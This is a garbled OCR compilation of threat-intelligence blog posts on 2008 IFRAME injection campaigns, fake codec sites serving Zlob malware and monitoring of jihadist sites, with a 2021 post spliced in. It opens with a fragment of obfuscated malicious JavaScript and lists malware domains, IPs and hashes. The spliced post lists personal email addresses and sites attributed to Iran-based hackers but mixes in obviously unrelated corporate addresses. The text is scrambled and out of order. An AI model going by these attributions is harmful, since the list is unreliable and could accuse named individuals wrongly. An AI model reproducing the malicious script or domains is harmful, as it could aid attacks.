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8%29%2.a%31%37%32%36%3 0%32%29%2b%27%61%36%37%31%39%66%5C%27%2 0%77%69 
546926 7 468% 7 4430432432%433%2 647347447 9%60%65430d65042 746446947347 846% 
MoO ZC 62 F 40946647 240 146046543062 7429"))5 </script> 


The "window of opportunity" for traffic acquisition by taking advantage of a huge anticipated 
traffic is something malicious parties always find adaptive ways to take advantage of. Back in 
December, 2007, the same event based [1]malware embedded attack appeared at a French 
government's site covering France/Libya relations right in the middle of Libya’s leader visit 
in the country. My detailed analysis back then revealed details of the usual RBN connection, 
with IFRAME hosts switchng between [2]HostFresh, Ukrtelegroup Ltd, and Turkey Abdallah 
Internet Hizmetleri, to surprisingly end up to [3]the New Media Malware Gang original IP, 
futher confirming the existence of what’s now a diverse ecosystem. 


The same [4]timely malware embedded attack happened at the top of the Annual We- 
blog Awards site - The Bloggies as [5]TrendMicro assessed on Monday : 


"The Web site of the Annual Weblogs Awards — more informally known as the Bloggies 
— was hacked recently, serving up a malicious Javascript to its visitors. This happened on the 
eve of the award ceremony, as reported in NEWS.com.au." 


An embedded malware screenshot is worth a thousand words, so here it goes attached, 
and IcePack’s now easily detectable module : 


Scanner results : 47 % Scanner(17/36) found malware! 
File Size : 10666 byte 

MD5 : 0860a1f5f1b27db14fedbfc979399fa4 

SHA1 : 81c4ca763850fd3d675a0955ee6885ce83db53a5 
HTML/Psyme.Gen; Trojan-Downloader.JS.Agent.et 
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Moreover, wilicenwww.biz/1/1/ice-pack/index.php is currently responding to 202.75.38.150, 
and besides the descriptive IcePack host, the IP also responds to the following domains : 


bigsavingpharmacy.com 
infosecurestatus.com 
pharmacysuperdiscount.com 
rspectrum.name 

sicil.info 

sicil256.info 
superdiscountpills.com 
mydnsweb.net 
thegogosearch.com 


So what? Historical CYBERINT untimately improves your situational awareness. Sicil.info 
was the main domain behind the [6]Syrian Embassy in the U.K malware embedded attack. 
Back then, sicil.info was responding to 203.121.79.71, and now to 202.75.38.150, switching 
locations doesn’t mean a clean domain reputation anyway. 


1. http: //ddanchev. blogspot .com/2007/12/have-your-malware-in-timely-fashion.htm 


2. http: //ddanchev. blogspot .com/2008/02/geolocating-malicious-isps.htm 


3. http: //ddanchev. blogspot .com/2008/03/new-media-malware-gang-part-four.htm 
4. http: //www.news.com.au/technology/story/0, 25642, 23345956-5014239, 00. htm 
5. 
6. 


ttp://blog.trendmicro.com/bloggies-gives-out-malware-before-awards/ 


ttp://ddanchev. blogspot .com/2007/09/syrian-embassy-in-london-serving .htm 


4.3.12 PR Storm - Mass iFRAME Injectable Attacks (2008-03-17 23:44) 


Here’s some recent media coverage regarding the [1]SEO poisoning attack through exploiting 
the ABC of web application security, namely input validation, a good example of tactical 
warfare combing two different attack tactics, blackhat SEO for traffic acquisition and abusing 
input validation for injecting iFRAMES, and abusing the sites’ search engine optimization 
practices of storing the now input violated pages. Meanwhile, Iftach Amit at Finjan points out 
that [2]as it looks like we were on the same page. Here’s Google’s comment regarding these 
incidents provided to Finjan : 


"Google acknowledged that this was a known attack vector, and confirmed that they 
are indeed working on ways to manipulate and “sanitize” links provided by them in an effort 
to minimize the effect of incidents such as XSS on indexed sites. They also share our opinion 
on the reality of XSS and its affects on web browsing: "Google recommends that sites fix their 
cross-site scripting vulnerabilities as a priority. These can be abused in a number of ways, 
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including bad interactions with search engines. Google is helping by reaching out to affected 
organizations. In addition, Google has internal processes to block abuses when the situation 
warrants." 


The responsible full-disclosure, namely disclosing and every domain affected, the IPs of 
the malicious domains used in the redirection, and obtained a sampled result of where are 
the domains actually leading to, should have had the effect it’s supposed to - raise awareness 
and put responsible pressure on the people involved in taking care of making sure no one 
can submit executable commands that will later on get cached, and load, such as iFRAMES 
in this case. Most of all, these are high page rank-ed sites, namely the junk that they submit 
is appearing within the first 10/20 search results and is getting crawled within hours upon 
submitting it, and therefore it must be taken care of as soon as possible, on multiple fronts. 


- [3]The Other iframe attack 

- [4]Optimizing Cross Site Scripting - and general security practices 

- [5]Follow up to yesterday’s mass hack attack 

- [6]Hackers launch massive IFrame attack 

- [7]SEO poisoning attacks growing 

- [8]Attackers hijacking web site search engines to push malware; [9]German article 
- [10]Developers: Check Your %** & Inputs 

- [11]Researcher: Beware of massive IFrame attack 

- [12]iFrame attacks: Blame your Web admin guy 

- [13]More Search Results Getting iFRAMEd 

- [14]Ongoing IFrame attack proving difficult to kill 

- [15]Injection attacks target legit websites - twenty-nine thousand sites and counting 
- [16]Mass Hack Hits 200,000 Web Pages 

- [17]200.000 nettsider hacket 


In an upcoming post, I'll expose many other such fake codecs about to get included in 
future campaigns, and emphasize on the dynamics of orchestrating such a malicious cam- 
paign, namely keep it as sophisticated and as deep-linking/deep-iframing as possible to 
confuse automated malware aggregation approaches at the beginning of the campaign, and 
[18]Keep it Simple Stupid at the very end of the campaign. 


[19]Malicious economies of scale means an efficient and standardized attack approach, 
take [20]Rock Phish for instance, but it also means an easy way to detect and mitigate 
certain threats. In this malicious campaing for instance, nearly all the bogus .info domains 
with several exceptions are operating within the same netblock, and continue doing so. And 
the exceptions? It’s all a matter of perspective, whether or not you believe having a RBN 
hosted domain within the actual iFRAME, or the result of the iFRAME redirection in terms of 
importance. 


H 


ttp://ddanchev. blogspot .com/2008/03/more-high-profile-sites-iframe-injected.htm 


. bttp://www.finjan.com/MCRCblog.aspx?EntryId=190 
. http://isc.sans.org/diary .html?storyid=4144 
. bttp://www.finjan.com/MCRCblog.aspx?EntryId=190 


ttp://www.avertlabs.com/research/blog/index. php/2008/03/13/follow-up-to-yesterdays-mass-hack-attack/ 


ttp://www.computerworld.com/action/article.do?command=viewArticleBasickarticleId=9068402%intsrc=news_ts_ 


uBWN 


. http://www.securityfocus.com/brief/701 


N 
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4.3.13 Terror on the Internet - Conflict of Interest (2008-03-19 00:39) 


SSN 3B2-29-XXXX 
Phone Calls Date City Country Who Phone Number Duration 
25 Nov 2004 AlKhar Saudi Arabia as9!2 oils utd Jussi B7234XX 00:46:56 
27 Oct 2004 Aden Yemen fi ply 415 30586XX 00:30:41 
12 Nov 2003 ElOued Algeria past! ne glumes 68378xXX 00:13:37 
Emails Date From/To Who Email Subject 
01 Jun 2006 From a Aalld pucks XXXXKAKAXEORAKAKAKKX.2G 
17 May 2006 From ype Gat Quogue hs J8  XXKXKXKMEOKXXXXX. ID ss 
23 Mar 2006 From Jad as XXXXK MOK XXXKKAXX. Sd - 
30 Nov 2005 To de cain cfuayl XXAXAKKKAKEOAAKK. CY 
15 Aug 2005 To digs 98 go gli he = XXX XDKXXXXX. Ga = 
18 May 2005 To dab ye p58 ele XXXXXXXAX KOA, Ib = 


** This information is not displayed for privacy purposes 
Threat Analysis Based on the destination and duration of phone calls and email messages sent 
and received, this individual is considered to be a low risk of terrorist threat. 


Insightful article by Greg Goth, discussing various aspects of the pros and cons of monitoring 
cyber jihadist sites next to shutting them down, as well as mentioning [1]my analysis of the 
[2]Mujahideen Secrets encryption tool v1.0 and v2.0. [3]Terror on the Internet: A Complex 
Issue, and Getting Harder : 


"Indeed, politicians around the world call at regular intervals for terrorist websites to be 
removed from their host sites’ servers or for search engines to block access to them. They 
also call for laws that would make posting instructions on how to kill or maim people or destroy 
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1. https: //ddanchev. blogspot .com/2019/12/announcing-law-enforcement-and-osint .html 


2. https: //ddanchev. blogspot .com/2020/08/profiling-currently-active-portfolio-of .htm 


17.2.6 Exposing a Currently Active Portfolio of Emails Belonging to Iran-Based Lone 
Hackers and Iran-Based Hacking Teams and Groups - An OSINT Analysis 
(2021-02-16 13:45) 


[1] 
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ANALYSIS BY DANCHO DANCHEV - REPORT PRICE 


Dear blog readers, 


| wanted to take the time and effort and publicly share a currently active obtained using Tech- 
nical Collection list of currently active email address accounts belonging to Iran-based lone 
hackers and Iran-based hacking groups and teams with the idea to assist U.S Law Enforcement 
including the security industry on its way to track down and prosecute the cybercriminals be- 
hind these campaigns including a currently active portfolio of personal Web sites belonging to 
lran-based lone hackers and Iran-based hacking groups and teams. Keep reading! 


Currently active portfolio of emails belonging to Iran-based lone hackers and Iran-based hack- 
ing groups and hacking teams: 


pr@irib.ir 
glqzxzli@163.com 
312082819@qq.com 
1782744631@qq.com 
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property punishable by law. Franco Frattini, the European Commission’s Vice President for 
Freedom, Justice, and Security, [4]called for a prohibition on websites that post bomb-making 
instructions in September 2007. And just as quickly, he rushed to announce that in doing so 
he was not trying to impinge on freedom of speech or information access or to inhibit law 
enforcement agencies from monitoring sites." 


There’re three perspectives related to cyber jihad, should the virtual communities be shut 
down, monitored, or censored so that they cannot be accessed by people who would potentially 
get radicalized and brainwashed by the amazingly well created propaganda in the form of 
interactive multimedia? Given the different mandates given to different intelligence services 
and independent researchers, is where the conflict of interest begins. Moreover, don’t forget 
that independent researchers sometimes come up with the final piece of the puzzle to have 
an intelligence agency come up with the big picture in a cost-effective and timely manner, 
given they actually believe in OSINT and trust the source of the intell data of course. Now, 
picture the situation where an intelligence agency is shutting down cyber jihadist sites on 
a large scale not believing in the value that the intelligence data they they could provide, 
another one given a mandate to censor cyber jihadist communities compiling reports stating 
that someone’s shutting them down before they could even censor them, and a third one who 
would have to again play cat and mouse game the locate them once they’ve shut down by 
the first intel agency already. Ironic or not, different mandates and empowerment is where the 
contradiction begins. Let’s discuss the three mandates and go in-depth into the pros and cons 
of each of them to come up with a philosophic solution to the problem, as | belive it’s perhaps 
the only way to provoke some thought on the best variant. 


Shutting the communities down - 


Before shuting them down you need to know where they are, their neighbourhood of supporters 
who will indirectly tip you on the their latest location once they have their previous domain 
shut down. Personal experience and third party research indicates that over 90 % of the cyber 
jihadist communities/blogs are hosted by U.S based not owned companies. And with the lack of 
real-time intell sharing between the agencies themselves, the first who picks up the community 
will be responsible for its faith, literally. Butin reality, preserving the integrity of a cyber jihadist 
community, and convincing the right people that balanced monitoring next to shutting it down 
is more beneficial, remains an idea yet to be considered. Back in 2007, | did an experiment, 
namely | [5]crawled ten cyber jihadist forums and blogs and extracted all the outgoing links 
from these communities to see their preferred choice for online video and files hosting. A 
couple of months later, the communities got shut down, so when the same thing happened 
while | was crawling the Global Islamic Media Front’s, and Inshallahshaheed’s web presence, 
it became clear that while some are crawling, and others censoring, third parties are shutting 
them down. 


The bottom line - shutting them down doesn’t mean that they'll dissapear and will never 
come back, exactly the opposite. Personal experience while handling the Global Islamic Media 
Front is perhaps the perfect and best hands-on experience on the benefits of shutting them 
down, given you’ve built enough convidence in your abilities to locate their new location. 
If you think that the cyber jihadist site or community you’re currently monitoring is a star, 
look above, it’s full of starts everywhere, once you start drawing the lines between them, a 
figure of something known emerges, in this case once a cyber jihadist community is shut 
down, its most loyal and closely connected cyber jihadist communities will expose their 
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intimate connection not by just starting to promote their new location online, but even 
better, you'll have them use the second cyber jihadist community to directly reach their au- 
dience by the time they set up the new location and resume the propaganda and radicalization. 


There’s no shortage of cyber jihadist blogs, forums and sites, and personal experience shows 
that upon having a cyber jihadist community shut down, they re-appear at another location. 
It’s shut down again, it re-appears for a second time. I’ve seen this situation with Instahaleed 
and GIMF, and each and every time they had their blogs and sites removed from their hosting 
providers, mainly because it’s rather disturbing that the majority of such communities are 
hosted on U.S servers, it’s this short time frame which will either lead you to their new location, 
you risk loosing their tracks. However, the vivid supporters of PSYOPs are logically visionary 
enough to understand what does undermining their audiences’ confidence in the community’s 
capability to remain online means. 


Monitoring the communities - 


In order to reach the "shut it down or monitor it" stage in your analysis process, you really need 
to know where the cyber jihadists forums and sites are, else, you will be wasting your time, 
money and energy to create [6]fake cyber jihadist communities in the form of web honeypots 
for jihadist communication. Monitoring is tricky, especially when you don’t know what you’re 
looking for, don’t prioritize, don’t have a contingency plan or an offline copy of the communitiy 
and wrongly building confidence in its ability to remain online. Moreover, [7]monitoring for 
too long results in terrabytes of noise, and from a psychological perspective sometimes [8]the 
rush for yet another fancy social networking graph to better communicate [9]the collected 
data, ends up in the worst possible way - you miss the tipping point moment. 


Censoring the communities - 


| often come across wishful comments in the lines of "blocking access to bomb and poison 
making tutorials", missing a very important point, namely, that these very same manuals, and 
jihadist magazines are not residing in a cyber-jihad.com/bomb-making-guide.zip domain and 
file extension form, making the process a bit more complex to realize. Unless of course the 
censorship systems figures out ways to detect the content in password encrypted archive files 
served with random file names and hosted on one of the hundreds free web space providers. 
Then again, given the factual evidence that cyber jihadists are encouraging the use of Internet 
anonymization services and software, your censorship efforts will remain futile. 


As I’m posting this overview of various ways of handling cyber jihadist communities, yet 
another community is starting to attract cyber jihadists, thanks to their understanding of noise 
generation by teaching the novice cyber jihadists on the basics of running and maintaing such 
a community. What’s perhaps most important to keep in mind is that, what you’re currently 
analyzing, trying to shut down or censor whatsoever, is the public web, the Dark Web, the one 
closed behind authentication and invite-only access yet remains to be located and properly 
analyzed. If cyber jihad is really a priority, then there’s nothing more effective than the 
combination of independent researchers and intelligence analysts. 


Related posts: 

[10] Inshallahshaheed - Come Out, Come Out Wherever You Are 
[11]GIMF Switching Blogs 

[12]GIMF Now Permanently Shut Down 
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4.3.14 A Portfolio of Fake Video Codecs (2008-03-19 23:18) 


DvDaccess 


Software thet allows video access 
to most coded videos. 


OVO access is a rrestnedia sofware Mat allowa access 1) Windows 
Cotecbon of MUbMeGs Givers and integrates wih any appicaton 
using Directinow and Mkrosot Video fee Windows OVOaccess will 


haghty Increase quality of video Sies you play 
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Media and other music es. Renew stereo depth, 964 3D surround 
S0utrd, restore 4OUNd Clarty, BOOS! your audi levels, and produce 
deep, nch bass sounds 


Shall we expose a huge domains portfolio of fake/rogue video codecs hosting the same 
Zlob variant on each and every of the domains, thereby acting as a great example of what 
malicious economies of scale means? But of course. As I’ve pointed out in a previous post, 
on the tactical warfare front the output of a malicious IFRAME campaign is often neglected 
from the perspective of lacking the two/three layered IFRAME-ing and redirection that the 
malicious parties usually implement at the beginning of the campaign. Basically, the over 
twenty fake video codecs domains are hosting the same binary in the form of a Zlob malware 
downloader, [1]infrastructure courtesy of the RBN’s used ATRIVO (64.28.176.0/20). Currently 
active domains hosting the" DVDAccess codec", namely a Zlob malware variant : 
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asgar@yahoo.com 

msn _asadollahi@yahoo.com 
innniss@gmail.com 

vaziri ali@yahoo.com 

ali _khhh@yahoo.com 
allahl46@gmail.com 

ali kiii@yahoo.com 
Aladdin@yahoo.com 
rahnemaay@yahoo.com 
yaghubtohidian@yahoo.com 
shikposh2007@yahoo.com 


aminzadeh _mohamad@yahoo.com 


farnaz _jaghatay@yahoo.com 
sin@yahoo.com 
spc@yahoo.com 
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ir_ Hack@MSN.com 
info@themepunch.com 

asal _jedi2001@yahoo.com 
a.mezarei@yahoo.com 
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mhmk1995@yahoo.com 
play@eset.com 
android-support@wikimedia.org 
feedback@automattic.com 
mobile-support@automattic.com 
feedback.android@4shared.com 
Khalilsarwari2005@Yahoo.com 
jason@onehackoranother.com 
hello@technologyadvice.com 
3skOrbut0@gmail.com 
root@kern268.build.sw.ru 
niloofarbeyzaie@gmx.at 
www.info@avazak.ir 
legal@wordpress.com 
askgta@microsoft.com 
info@noorlib.ir 
your@email.com 

cert@cert.org 
emaildatenschutz@generitech.de 
emailprivacy@generitech.com 
emailprivacy@generitech.fr 
e-mailprivacy@voorenbeeld.nl 
shayangold@gmail.com 
privacy@wikimedia.org 
payamafghan@gmail.com 
sales@pressable.com 
ajmalaand@hotmail.com 

Ajmal _toorman@hotmail.com 
Jaras k@hotmail.com 
wwardak@hotmail.com 

ahmed _azami@yahoo.com 

as _sheranil23@yahoo.com 
ziasahil ro@yahoo.com 
info@arman.fm 


Mi negargar@yahoo.com 
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Danish2k2000@yahoo.com 
dastanoona@hotmail.com 
saharweb@hotmail.com 
karimzai@gmail.com 
asefkhavati@hotmail.com 
Asef omar@yahoo.com 
afghanpost@rogers.com 
afghanomar@hotmail.com 
brishnalik@yahoo.com 
ikramudin s@hotmail.com 
akramkhpalwak@yahoo.com 
Amrullah _moid@yahoo.com 
wahi _ahmad005@hotmail.com 
shaiq _afghan@hotmail.com 
shaheenkhankhel@yahoo.com 
turnak2000@yahoo.com 

emal _pasarly@hotmail.com 
Brakwal_m@yahoo.com 

baz _moh1@hotmail.com 
Babrak _mm@yahoo.com 
barualaybajauri@hotmail.com 
helmand101@yahoo.com 
Wwiarjanan@yahoo.com 
pashtonmle2005@yahoo.com 
basharmal n@yahoo.com 
Faizan kandahar@yahoo.com 
bashir nadim2003@yahoo.com 
bashirgwakh@hotmail.com 
boriwalkakar@hotmail.com 
webmaster@benawa.com 
pmkarwan@hotmail.com 
free2rhyme@yahoo.com 
support@nukers.ir 
info@nedasys.com 
info@dastur.info 
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Including the following portfolio of currently active personal Web sites belonging to Iran- 
based lone hackers and Iran-based hacking groups and hacker teams: 


http://black-shadow.persiangig.com/ 
http://javananclub.persiangig.com/ 
http://mohsen3800.persiangig.com/ 
http://adamforush.persiangig.com/ 
http://arvineasthackers.persiangig.com/ 
http://yaban3.persiangig.com/ 
http://soa-team.persiangig.com/ 
http://bulurp.persiangig.com/ 
http://temp-designer.persiangig.com/ 
http://s3curity.persiangig.com/ 
http://manimaxi.persiangig.com/ 
http://gorosneh.persiangig.com/ 
http://samiruk.persiangig.com/ 
http://eximor.persiangig.com/ 
http://darkunder.persiangig.com/ 
http://matin-teror.persiangig.com/ 
http://ratohOst.persiangig.com/ 
http://behzadmesri.persiangig.com/ 
http://mohamm3d.persiangig.com/ 
http://r3d-error.persiangig.com/ 
http://m4hd1.persiangig.com/ 
http://anti-network.net/ 
http://pythonr00t.persiangig.com/ 
http://invisible.persiangig.com/ 
http://alb2a3j4m5.persiangig.com/ 
http://medrik1.persiangig.com/ 
http://h4ckerr.persiangig.com/ 
http://essaji.persiangig.com/ 
http://h3x73l.persiangig.com/ 
http://b-i-o-s.persiangig.com/ 
http://d4rvi5hi.persiangig.com/ 
http://sasukeakastuki.persiangig.com/ 
http://dwast.persiangig.com/ 
http://keent.persiangig.com/ 
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http://cr4zylov3r.persiangig.com/ 
http://the-rock.persiangig.com/ 
http://pejv4k.persiangig.com/ 
http://sunboy871.persiangig.com/ 
http://ham3chi.persiangig.com/ 
http://s-w-a-t.persiangig.com/ 
http://cr4ck3r.persiangig.com/ 
http://mohammad-ice.persiangig.com/ 
http://hosinn.persiangig.com/ 
http://nazanin.persiangig.com/ 
http://jenik2.persiangig.com/ 
http://sar4tan.persiangig.com/ 
http://bahman666.persiangig.com/ 
http://farbodmahini.persiangig.com/ 
http://blackcap.persiangig.com/ 
http://behfaraz.persiangig.com/ 
http://ehsan-empire.persiangig.com/ 
http://afshin111.persiangig.com/ 
http://darkhastdotnet2.persiangig.com/ 
http://cyberdevilz.persiangig.com/ 
http://redoc.persiangig.com/ 
http://diagramm.persiangig.com/ 
http://amarok.persiangig.com/ 
http://brainbOy.persiangig.com/ 
http://tir3x-r00t. persiangig.com/ 
http://samirdotnet.persiangig.com/ 
http://hdnsoft.persiangig.com/ 
http://arianismmm.persiangig.com/ 
http://arefmaramazi.persiangig.com/ 
http://kabooos.persiangig.com/ 
http://maarek.persiangig.com/ 
http://sysn3t.persiangig.com/ 
http://badjen3.persiangig.com/ 
http://mr-bami.persiangig.com/ 
http://datawar.persiangig.com/ 
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http://hkhmerikhi.persiangig.com/ 
http://iraniancyber.persiangig.com/ 
http://tink3r.persiangig.com/ 
http://vahid4251.persiangig.com/ 


http://satanicstar.persiangig.com/ 


http://dangerous-hacker.persiangig.com/ 


http://ettefaghi.persiangig.com/ 
http://blackfox.persiangig.com/ 


http://amirsalartavakoli.persiangig.com/ 


http://datacoders.persiangig.com/ 
http://vvanted.persiangig.com/ 
http://bia2takmusic.persiangig.com/ 
http://esoft.persiangig.com/ 
http://scriptplazza.persiangig.com/ 
http://alijojo.persiangig.com/ 
http://akams.persiangig.com/ 
http://mssql.persiangig.com/ 
http://farbodezrael.persiangig.com/ 
http://msu-amozesh.persiangig.com/ 
http://immortal-boy.persiangig.com/ 
http://saeedgraph.persiangig.com/ 
http://msu360.persiangig.com/ 
http://d3f4c3r.persiangig.com/ 
http://d4wood.persiangig.com/ 
http://aminsheikha.persiangig.com/ 
http://motakhases. ir/ 
http://encOd3r.persiangig.com/ 
http://avadakedavra.persiangig.com/ 
http://neo-the-funny.persiangig.com/ 
http://karaji21.persiangig.com/ 
http://blackportal.persiangig.com/ 
http://natars.persiangig.com/ 
http://ravager.persiangig.com/ 
http://n4bil.persiangig.com/ 
http://siamak17.persiangig.com/ 
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http://evilshadow.persiangig.com/ 
http://lalecarbon.persiangig.com/ 
http://iran-pix.persiangig.com/ 
http://quarenix.persiangig.com/ 
http://movaffag.persiangig.com/ 
http://skOnter.persiangig.com/ 
http://devilzcOder.persiangig.com/ 
http://security-team.persiangig.com/ 
http://kish110.persiangig.com/ 
http://boromir.persiangig.com/ 
http://timer.persiangig.com/ 
http://ali0123.persiangig.com/ 
http://ezami.persiangig.com/ 
http://r0zi33h.persiangig.com/ 
http://anonyr3z4.persiangig.com/ 
http://matin0O21.persiangig.com/ 
http://terminator1.persiangig.com/ 
http://iohteam.persiangig.com/ 
http://sianOr.persiangig.com/ 
http://mohammadvaker.persiangig.com/ 
http://engineer-sniper.persiangig.com/ 
http://aware.persiangig.com/ 
http://samadzade.persiangig.com/ 
http://hamedhaker.persiangig.com/ 
http://catcOnfig.persiangig.com/ 
http://mr-4nonymous.persiangig.com/ 
http://tarfandrooz.persiangig.com/ 
http://wanted1.persiangig.com/ 
http://dangerman.persiangig.com/ 
http://hivateam.persiangig.com/ 
http://afsaran-agrab.persiangig.com/ 
http://sootak.persiangig.com/ 
http://anzalichi.persiangig.com/ 
http://maxpayne.persiangig.com/ 
http://virus45.persiangig.com/ 
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codecbest.com 
codecspace.com 
popcodec.net 
uincodec.com 
xhcodec.com 
stormcodec.net 
codecmega.com 
whitecodec.com 
jetcodec.com 


endcodec.com 
abccodec.com 


codecred.net 
cleancodec.com 
herocodec.com 
nicecodec.com 


DVDaccess’s pitch : "DVDaccess is a multimedia software that allowa access to Windows collec- 
tion of multimedia drivers and integrates with any application using DirectShow and Microsoft 
Video for Windows. DVDaccess will highly increase quality of video files you play. DVDac- 
cess enhances your music listening experience by improving the sound quality of video files 
sound, MP3, internet radio, Windows Media and other music files. Renew stereo depth, add 3D 
surround sound, restore sound clarity, boost your audio levels, and produce deep, rich bass 
sounds." 


Scanner results : 39 % Scanner (14/36) found malware! 
[2 ]Trojan-Downloader.Win32.Zlob.eie 

File Size : 74823 byte 

MD5 : 30965fdbd893990dd24abda2285d9edc 

SHAI1 : 53eacbb9cdf42394bd455d9bd2275f05730332f7 


Why are the malicious parties so KISS oriented at the end of every campaign, compared 
to the complexity and tactical warfare tricking automated malware harvesting approaches 
within the beginning of the campaign? Because they’re not even considering the possibility of 
proactively detecting the output of the many other malware campaigns to come, which will 
inevitable be ending up to these very same domains serving a single Zlob variant. Just like 
the recent massive IFRAME attacks, where in between the live exploit URLs and rogue security 
software, the end users were redirected to DVDaccess as well. In fact, the [3]massive IFRAME 
attack campaign was, and continues to redirect to one of the domains in the portfolio I’ve just 
provided you with. 


1. http://ddanchev. blogspot .com/2008/03/rogue-rbn-software-pushed-through.htm 


2. http: //ddanchev. blogspot . com/2008/03/more-high-profile-sites-iframe-injected.htm 
3. http://ddanchev. blogspot . com/2008/03/more-high-profile-sites-iframe-injected.htm 
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http://md-r00t.persiangig.com/ 
http://h4med.persiangig.com/ 
http://darkcoder.persiangig.com/ 
http://bia2saadi.persiangig.com/ 
http://p35download.persiangig.com/ 
http://jshacker.persiangig.com/ 
http://srm-kabir.persiangig.com/ 
http://cenator-vb.persiangig.com/ 


http://karim-psp.persiangig.com/ 


http://ahwazdownload.persiangig.com/ 


http://drwxrwxrwx.persiangig.com/ 
http://mahdi45.persiangig.com/ 
http://injenious.persiangig.com/ 
http://mrdecoder.persiangig.com/ 
http://masuod-shift. persiangig.com/ 
http://rking.persiangig.com/ 
http://onlineteach.persiangig.com/ 
http://anatema.persiangig.com/ 
http://impossibles.persiangig.com/ 
http://lordbooter.persiangig.com/ 
http://wantedst. persiangig.com/ 
http://diedloves.persiangig.com/ 
http://boxochi.persiangig.com/ 
http://I2odon.persiangig.com/ 
http://lordnitro.persiangig.com/ 
http://thr3at.persiangig.com/ 
http://masoud-70.persiangig.com/ 
http://androidpoor.persiangig.com/ 
http://bimbim.persiangig.com/ 
http://shahinfalcon.persiangig.com/ 
http://java-mesh.persiangig.com/ 
http://anax2x.persiangig.com/ 
http://ario-barzan.persiangig.com/ 
http://arman98.persiangig.com/ 


http://queen-iran.persiangig.com/ 
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http://lourenzo.persiangig.com/ 
http://vndmsm.persiangig.com/ 
http://mr-parsi.persiangig.com/ 
http://persian-defacer.persiangig.com/ 
http://alipcl.persiangig.com/ 
http://erfanx2x.persiangig.com/ 
http://error-back-x9.persiangig.com/ 
http://drmaster.persiangig.com/ 
http://fulltarh.persiangig.com/ 
http://pantagon.persiangig.com/ 
http://mamd00.persiangig.com/ 
http://hiacker.persiangig.com/ 
http://m3hl2ad.persiangig.com/ 
http://gta5edit.persiangig.com/ 
http://powerdeactiver.persiangig.com/ 
http://ninja-armin.persiangig.com/ 
http://jimunix.persiangig.com/ 
http://k4zem.persiangig.com/ 
http://nobOdy.persiangig.com/ 
http://mrnavid.persiangig.com/ 
http://hares.persiangig.com/ 
http://khan2.persiangig.com/ 
http://liplipok.persiangig.com/ 
http://bm98511.persiangig.com/ 
http://nofacenoname.persiangig.com/ 
http://medl01.persiangig.com/ 
http://infoweb.persiangig.com/ 
http://encoder.persiangig.com/ 
http://optishock.persiangig.com/ 
http://programmers.persiangig.com/ 
http://deface.persiangig.com/ 
http://apexpredator.persiangig.com/ 
http://mr-pass.persiangig.com/ 
http://amir-666.persiangig.com/ 
http://iranmoon.persiangig.com/ 
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http://kingdeface.persiangig.com/ 
http://mahabad1.persiangig.com/ 
http://trOyt34m.persiangig.com/ 
http://alOn3-m4n.persiangig.com/ 
http://kingback.persiangig.com/ 
http://codez.persiangig.com/ 
http://noter.persiangig.com/ 
http://spyn3t.persiangig.com/ 
http://kh-co.persiangig.com/ 
http://syndrOme.persiangig.com/ 
http://golpaboyz.persiangig.com/ 
http://jatropat.persiangig.com/ 
http://mehdy007.persiangig.com/ 
http://titaniom1370.persiangig.com/ 
http://ehsanmae. persiangig.com/ 
http://hackreza.persiangig.com/ 
http://esfahan-security.persiangig.com/ 
http://alireza5800.persiangig.com/ 
http://yazdanx7.persiangig.com/ 
http://a-3is.persiangig.com/ 
http://fobiyght76.persiangig.com/ 
http://litoe.persiangig.com/ 
http://atrix.persiangig.com/ 
http://kovalak.persiangig.com/ 
http://rebell.persiangig.com/ 
http://titaksecteam.persiangig.com/ 
http://bigb4ng.persiangig.com/ 
http://cyberboys.persiangig.com/ 
http://wolf1208.persiangig.com/ 
http://mjbarbod.persiangig.com/ 
http://hashor.persiangig.com/ 
http://papet.persiangig.com/ 
http://hushy.persiangig.com/ 
http://saeed-00x.persiangig.com/ 
http://zabOn.persiangig.com/ 


13665 


http://a74462.persiangig.com/ 
http://abbas-virus.persiangig.com/ 
http://abdrezaha.persiangig.com/ 
http://afeel.persiangig.com/ 
http://afgar753.persiangig.com/ 
http://afr-computer.persiangig.com/ 
http://agh45.persiangig.com/ 
http://albert.persiangig.com/ 
http://ali-danger.persiangig.com/ 
http://ali486.persiangig.com/ 
http://aliclop.persiangig.com/ 
http://alierror1.persiangig.com/ 
http://alirezabiyal.persiangig.com/ 
http://alirezashiri.persiangig.com/ 
http://alirezaxxl.persiangig.com/ 
http://alisoft. persiangig.com/ 
http://alvlin.persiangig.com/ 
http://am-tools.persiangig.com/ 
http://amin77.persiangig.com/ 
http://amir-pw.persiangig.com/ 
http://amir23.persiangig.com/ 
http://amirhossein021.persiangig.com/ 
http://amirjustfriend.persiangig.com/ 
http://amirmansoury.persiangig.com/ 
http://amolhackers.persiangig.com/ 
http://anti-network.persiangig.com/ 
http://antichat. persiangig.com/ 
http://www.antifilterby4ull-hacker.ht/ 
http://applexxe.persiangig.com/ 
http://aragh.persiangig.com/ 
http://arazdownloadpg.persiangig.com/ 
http://aria-security.persiangig.com/ 
http://armaninvisible.persiangig.com/ 
http://armingame.persiangig.com/ 
http://armintanha.persiangig.com/ 
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http://artenis.persiangig.com/ 
http://ashitor.persiangig.com/ 
http://ashkanan3.persiangig.com/ 
http://asm952.persiangig.com/ 
http://attack.persiangig.com/ 
http://b3ylux3.persiangig.com/ 
http://bachebahal.persiangig.com/ 
http://bamiran.persiangig.com/ 
http://bardiajoon.persiangig.com/ 
http://barnamehnevesy.persiangig.com/ 
http://beat20.persiangig.com/ 
http://best-gold.persiangig.com/ 
http://bestbset.persiangig.com/ 
http://bia2bestfile.persiangig.com/ 
http://bia2music2.persiangig.com/ 
http://big-killer.persiangig.com/ 
http://bijism.persiangig.com/ 
http://biologystudentshirazu.persiangig.com/ 
http://blackdata.persiangig.com/ 
http://blackh4t. persiangig.com/ 
http://blacklast.persiangig.com/ 
http://blackwizardmagician.persiangig.com/ 
http://blogskin.persiangig.com/ 
http://b000000ote.persiangig.com/ 
http://cOderl.persiangig.com/ 
http://ceh2010.persiangig.com/ 
http://chater.persiangig.com/ 
http://ciph3r.persiangig.com/ 
http://civilz.persiangig.com/ 
http://coldfire.persiangig.com/ 
http://coldn.persiangig.com/ 
http://comonism.persiangig.com/ 
http://computer-lab2.persiangig.com/ 
http://cover-weblog.persiangig.com/ 


http://craft.persiangig.com/ 
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http://crim3r.persiangig.com/ 
http://csundragon.persiangig.com/ 
http://cybersaboteur.persiangig.com/ 
http://d3structlv3.persiangig.com/ 
http://dad4mahan.persiangig.com/ 
http://daimon74.persiangig.com/ 
http://darkhastdotnet.persiangig.com/ 
http://darknessxxl.persiangig.com/ 
http://darkwitch.persiangig.com/ 
http://datairan.persiangig.com/ 
